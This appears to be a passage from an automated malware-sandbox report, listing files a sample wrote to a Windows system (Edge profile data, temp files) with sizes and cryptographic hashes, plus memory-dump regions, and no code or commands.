59e62d778d56b2929a6de2762146a88d

SHA1
9e0705d622f6316d9e1e8d4e7f2c72d99af9ab73

SHA256
e203c38d4adc8c42c1e0fe7bb20c00ee5ffea76dd8b0e928600d33125f026e3f

SHA512
82abc983aaec15c510eabaf493c04beb05a40736e7e72b09d7ef0e8b31a03476d48675e8abffa750841a6e5a660104fdfe825273c9f322ab627c9f26ed0eb860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0820611471c1bb55fa7be7430c7c6329

SHA1
5ce7a9712722684223aced2522764c1e3a43fbb9

SHA256
f00d04749a374843bd118b41f669f8b0a20d76526c34b554c3ccac5ebd2f4f75

SHA512
77ea022b4265f3962f5e07a0a790f428c885da0cc11be0975285ce0eee4a2eec0a7cda9ea8f366dc2a946679b5dd927c5f94b527de6515856b68b8d08e435148

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
425e83cc5a7b1f8edfbec7d986058b01

SHA1
432a90a25e714c618ff30631d9fdbe3606b0d0df

SHA256
060a2e5f65b8f3b79a8d4a0c54b877cfe032f558beb0888d6f810aaeef8579bd

SHA512
4bf074de60e7849ade26119ef778fe67ea47691efff45f3d5e0b25de2d06fcc6f95a2cfcdbed85759a5c078bb371fe57de725babda2f44290b4dc42d7b6001af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
72B

MD5
0304aa8058a4c117857f8e56ccb7b887

SHA1
35f29be46483d7e54e92553571ead3b38c3b48c7

SHA256
8a225c715e8335e17d04d65ae8b6a3b2fda578f2f65c2261a0665644f5407792

SHA512
12cb4facab112ff20806cb8cb3e651a4a8f37871e62e2df771a36a15a1e4eb35620a407c91efa559d3215989ddbc3926556bea53d5437b717fb51250ab0ccf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57c7c4.TMP
Filesize
48B

MD5
83c51652e25abe31185065c69d63ba77

SHA1
496243deb406ea3f7baaca3f51000678648dc0cb

SHA256
38b782dc1f823f99347e4a0c665e83802fc8bdb0494d83ee60eebfde2bed7e0b

SHA512
55037dfb915eee98174a693ed4f3b934cd36e330da2c778c89fd1fa5a77da3961ebb5cc2830d3c39208adfa4f8e70f6a37f9abd1e99695764032e2bff993d435

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
25dd28469cce338b023e8ef98e0f4467

SHA1
efcd816671f71a70ff54050bdc3e38dbb5aba143

SHA256
df3856e91af3cd1d9d309b815194e6a96e3760b3007ae8f5bce6970721e78333

SHA512
1ed46f0db631acf68150b5964c7340b38a68b825ebfb4b56c842fa370567d540157dcceddf5f10c93bcc43c1e9ffee10eb79dc727308f5bc4f139be23a825736

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
690B

MD5
1cfdc54745099d6256ab4d56154dd78f

SHA1
7683a5765bc2efb679656a32fb38a8b75065faf9

SHA256
4bd9159b4fc4ae523a928a75677c3c4a144be7d107b03e45956820273eb76680

SHA512
311f87cb2bf68986912c5cc6e3b61e61537c5f862173c2bad542dce35d46b36d74f0c4598561fd79d648ba81e6c163101ecd3967de1ebd39700223dc296d6ce9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
dbd03badf4fe3c7ab518a44357ac3334

SHA1
0f5c8e1dee5acf916241ab6946aa4260ebe5c295

SHA256
36f2bcd873e20e9eb1c8163646bc368513ec820d4ed6273aa227ccf31340d1db

SHA512
4924c04e5dc75d11403499982b367e647fd40eac4a564e8e7ff892c7c01f3ec4a882d8eedc6dd813e452de24b28eef2a684af22bfb96a26dcdb1919ae7c348b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
4337f2c1fac97bfa4686f6cc65489b73

SHA1
5abc5e6ab2ef696039542ef0be360342a7515d19

SHA256
38dcb551b8733d87dc1d2fab8d43ef1894e18a3d56a6d9de74d2ca9b41a98d0e

SHA512
977e2cc4f0d1172ac64f826a963487f6e4f0f12f28404779d44d5d054e34f6628cc478f82cd91d73073065bd8de1e876e1eb9169cc40751718c3d1166af1760d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
821180dd64c3c5b899c20e57ee115b61

SHA1
0888180c5bd90ea43705fb4b177e062c02fbe46e

SHA256
204c102fdc9616d756f46731f258503ad3dd5554ce12adad01b02580f38c68b7

SHA512
76b17e7b0312fad42e59c5470004a9d1822d1e2b784814e560f714071264974b5f346818f1ad08d43c1a2f46dc96497ea6ba4761ca337b41eab627c19345b3a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
d53ac35ab3976e67caeed75c4d44ffc1

SHA1
c139ab66d75dc06f98ada34b5baf4d5693266176

SHA256
647867c7236bcb78b7d585b476d82a101a077fac43c78dc59e612253fbf69437

SHA512
391355c71734ded913239a6db10a3202087e756bccc8e29411108f21b3f2460d9a9c606619aadd785285be70eddcf61ef9519441cd387cd3823c1399a6967cc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
6be90a4e153ac0db7901a270ca529197

SHA1
b42f9a1a2dcd10357237cd0086b526e95d16b94b

SHA256
3aa5e9ebaf225fcc674c57c93b94402a702a3c80703d0bd90c2d742bac0fcaa6

SHA512
981ce9451d44896b590709639dca43088ddd29ff1950c93a310268f5418d9d8c6611a2ee6cd54a4cc2ca268b8e1d4ce61022f2ec5cf90832acd2becfc36f57d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
b21cd2567e3ebd34e6ca4f1ba2ef8bef

SHA1
5a945d433cb1265db3785157198c575448c238f5

SHA256
917933267dc2cb78ce42adaef3a101c243295fb1001c23d6ca013d51b28db8f0

SHA512
ebc035c4f946b1001e09f47a8c0ace3ec76e92248bb72c0f7bfd445780d3b8957623fab6e2c019b169c4b1d8a0a59661219f59d15aa33fa689edc3c80048096d

Download Submit
C:\Users\Admin\AppData\Local\Temp\364337.txt
Filesize
1KB

MD5
f9ca178ada7d668ee2db9a18c34b5656

SHA1
183871306843ad86aab5f44ae0993c4a2e9ca5a4

SHA256
3ed1e8d44578665d638c55c606fd408c142553147219985d127148c5502508d4

SHA512
17d4964c5834b876330284225dea24f3edbf518c49f768975a5af41e7cc5736314b2aec20e5a47b0cd78d46730535fea509f1639df37e74b341b69e3e51595a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\364337.txt
Filesize
3KB

MD5
7bfb4b5c910416bab658296d5fd3283c

SHA1
45f14b453cea6783023bebc14a8654e329d8e2f2

SHA256
9df1120220a2f20844c908ae369e6ffa48181e073c0442048bc9b8f18ab9054a

SHA512
59975c1a261fc37fabbf98cf874cf151fe85d02866dfd4d9df8be35df67f5fdbfe061d73f953949984665e5595b18ab916ecd0ac213b87982ae685016f7cf360

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pbpifwb.iyz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
821b11f6f1020c58baa0a2420bdfc532

SHA1
cea30a1d9184e543f683c5a42292d546c091e3eb

SHA256
4b7de1f960d9277f6896dcf3d2ee8ce14c1d4c89fc50f63b8b457a849de59949

SHA512
45a0573c80d729f4f5ab7e25359869d2f694a49ab89dcf32dc472316c2233bb8dafa1a609c1636aa002baf67e3d5a09c8cc4f9bcb218e6837f1c33f4bb6ecb7a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
3KB

MD5
68acd8b80919aac5f03872eb120cf91f

SHA1
95913a3c8454a03c662ab8ab958827dfccc300a2

SHA256
059d5ed507fe112071188f5a5630ccf7ce480350835831ce94d6e0a441a68e7b

SHA512
d3c767259cb36eb5eb0ae45c1d2c290ba0a8fd5363eea8ea014eed8ade70068163171e2451b86b478939b971ed34f58e2757a383d523de3aef69c23d5c7756b6

Download Submit
\??\pipe\LOCAL\crashpad_2688_TQXJAFIIZWWDXTLQ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/776-572-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-578-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-604-0x00000219CA0F0000-0x00000219CA0F1000-memory.dmp

Filesize
4KB

Download
memory/776-603-0x00000219C9FE0000-0x00000219C9FE1000-memory.dmp

Filesize
4KB

Download
memory/776-602-0x00000219C9FE0000-0x00000219C9FE1000-memory.dmp

Filesize
4KB

Download
memory/776-600-0x00000219C9FD0000-0x00000219C9FD1000-memory.dmp

Filesize
4KB

Download
memory/776-588-0x00000219C9DD0000-0x00000219C9DD1000-memory.dmp

Filesize
4KB

Download
memory/776-585-0x00000219C9E90000-0x00000219C9E91000-memory.dmp

Filesize
4KB

Download
memory/776-582-0x00000219C9EA0000-0x00000219C9EA1000-memory.dmp

Filesize
4KB

Download
memory/776-580-0x00000219C9E90000-0x00000219C9E91000-memory.dmp

Filesize
4KB

Download
memory/776-579-0x00000219C9EA0000-0x00000219C9EA1000-memory.dmp

Filesize
4KB

Download
memory/776-577-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-576-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-536-0x00000219C1B60000-0x00000219C1B70000-memory.dmp

Filesize
64KB

Download
memory/776-552-0x00000219C1C60000-0x00000219C1C70000-memory.dmp

Filesize
64KB

Download
memory/776-568-0x00000219CA250000-0x00000219CA251000-memory.dmp

Filesize
4KB

Download
memory/776-569-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-570-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-571-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-575-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-573-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/776-574-0x00000219CA270000-0x00000219CA271000-memory.dmp

Filesize
4KB

Download
memory/2968-153-0x0000025C5A260000-0x0000025C5A282000-memory.dmp

Filesize
136KB

Download
memory/2968-274-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/2968-275-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/2968-276-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/2968-165-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/2968-163-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/2968-164-0x0000025C5A2C0000-0x0000025C5A2D0000-memory.dmp

Filesize
64KB

Download
memory/3312-139-0x00007FFD886C0000-0x00007FFD886D0000-memory.dmp

Filesize
64KB

Download
memory/3312-133-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmp

Filesize
64KB

Download
memory/3312-134-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmp

Filesize
64KB

Download
memory/3312-138-0x00007FFD886C0000-0x00007FFD886D0000-memory.dmp

Filesize
64KB

Download
memory/3312-137-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmp

Filesize
64KB

Download
memory/3312-136-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmp

Filesize
64KB

Download
memory/3312-135-0x00007FFD8AB30000-0x00007FFD8AB40000-memory.dmp

Filesize
64KB

Download